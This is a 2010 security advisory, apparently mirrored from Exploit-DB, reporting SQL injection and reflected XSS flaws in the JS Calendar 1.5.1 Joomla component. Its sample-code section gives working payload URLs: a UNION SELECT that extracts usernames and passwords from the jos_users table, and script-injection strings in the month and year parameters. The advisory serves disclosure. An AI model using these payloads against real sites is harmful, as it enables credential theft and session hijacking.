Joomla! Component JS Calendar 1.5.1 – Multiple Vulnerabilities

  • 作者: Salvatore Fresta
    日期: 2010-10-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15224/
  • JS Calendar 1.5.1 Joomla Component Multiple Remote Vulnerabilities

 NameJS Calendar
 Vendorhttp://www.joomlaseller.com
 Versions Affected 1.5.1

 AuthorSalvatore Fresta aka Drosophila
 Website http://www.salvatorefresta.net
 Contact salvatorefresta [at] gmail [dot] com
 Date2010-10-09

X. INDEX

 I.ABOUT THE APPLICATION
 II. DESCRIPTION
 III.ANALYSIS
 IV. SAMPLE CODE
 V.FIX
 

I. ABOUT THE APPLICATION
________________________

JoomlaSeller-Calendar Eventisapowerful Joomla!
componentwhichallows you to easily create events and
publishthemonadesired date. It is a native build
componentforJoomla!1.5versionand can easily be
installed using theJoomla!back-end Install
functionality.


II. DESCRIPTION
_______________

Some parametersare not properly sanitised before being
used in a SQL query or returned to the user.


III. ANALYSIS
_____________

Summary:

 A) SQL Injection
 B) Multiple Reflected XSS
 

A) SQL Injection
________________

Inputpassedto "ev_id"parameterisnotproperly
sanitised before being used in SQL queries. This can be
exploitedtomanipulate SQLqueriesbyinjecting
arbitrary SQL code.


B) Multiple XSS
_______________

Inputpassed to the "month" and "year" parametersare
notproperlysanitisedbeforebeing returned to the
user. Thiscanbe exploited to execute arbitrary HTML
andscriptcode in a users browser session in context
of an affected site.


IV. SAMPLE CODE
_______________

A) SQL Injection

http://site/path/index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users


B) Multiple XSS

http://site/path/index.php?option=com_jscalendar&view=jscalendar&month=<script>alert('XSS');</script>

http://site/path/index.php?option=com_jscalendar&view=jscalendar&year=<script>alert('XSS');</script>


V. FIX
______

No fix.